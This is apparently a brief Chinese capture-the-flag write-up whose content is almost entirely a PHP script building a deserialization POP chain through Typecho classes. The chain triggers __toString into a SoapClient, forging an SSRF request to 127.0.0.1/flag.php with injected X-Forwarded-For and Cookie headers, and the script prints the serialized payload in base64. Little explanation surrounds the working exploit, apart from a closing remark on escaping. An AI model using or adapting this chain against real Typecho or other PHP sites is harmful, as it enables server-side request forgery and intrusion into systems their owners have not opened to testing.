这是一个稍长的pop链构造
构造出ssrf打127.0.0.1
利用soap类
脚本如下:
1 <?php 2 3 4 //第一步 反序列化HelloWorld_DB 5 class HelloWorld_DB{ 6 private $coincidence; 7 function __construct(){ 8 $this->coincidence = ['hello' => new Typecho_Db_Query()]; 9 } 10 11 function __wakeup(){ 12 $db = new Typecho_Db($this->coincidence['hello'], $this->coincidence['world']); 13 } 14 } 15 16 17 # 2. 实例化Typecho_Db 18 class Typecho_Db 19 { 20 public function __construct($adapterName, $prefix = 'typecho_') 21 { 22 $this->_adapterName = $adapterName; 23 24 # 这里触发__toString 25 $adapterName = 'Typecho_Db_Adapter_' . $adapterName; 26 27 $this->_prefix = $prefix; 28 29 $this->_adapter = new $adapterName(); 30 } 31 } 32 33 34 # 3触发Typecho_Db_Query中 _toString 35 class Typecho_Db_Query 36 { 37 private $_sqlPreBuild; 38 private $_adapter; 39 40 public function __construct() 41 { 42 $target = 'http://127.0.0.1/flag.php'; 43 $headers = array( 44 'X-Forwarded-For: 127.0.0.1', 45 'Cookie: PHPSESSID=mz12345678' 46 ); 47 $b = new SoapClient( 48 null, 49 array( 50 'location' => $target, 51 'user_agent'=>"xxxx ".join(" ",$headers), 52 'uri' => "xxx") 53 ); 54 $this->_sqlPreBuild =array("action"=>"SELECT"); 55 $this->_adapter = $b; 56 } 57 } 58 59 60 61 $a = new HelloWorld_DB(); 62 $aa = serialize($a); 63 var_dump($aa); 64 var_dump(base64_encode($aa)); 65 66 ?>
有的wp里提到了需要%00转 0然后s转S实际上用不到毕竟解码完啥也没过滤。
over.